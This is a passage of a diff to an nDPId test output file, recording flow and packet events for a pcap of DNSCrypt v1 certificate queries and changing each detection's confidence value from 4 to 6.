02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaUgAL0RJzsKAAABjgTMb+dYAbsGBJhPEXwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":443,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlaUAub0RTA4KAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIcladAAL0RCvkKAAABjgTMb7UbAbsCCB1KEXsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaggAL0RJzgKAAABjgTMb99cAbsGBKBJEX4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":446,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlagAub0RTAsKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclakgAL0RJzcKAAABjgTMb7oFAbsGBMWkEXoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348805} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":448,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAABQlakAub0RTAoKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":946739348912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739348912,"pkt":"ZmZmZmZmRERERERECABFAADWoIMAADQRymOOBMxvCgAAAQG7o6cAwiYzEX2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 
@@ -910,26 +910,26 @@ 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":946739348917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739348917,"pkt":"ZmZmZmZmRERERERECABFAADWoIgAADQRyl6OBMxvCgAAAQG7ugUAwg\/YEXqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 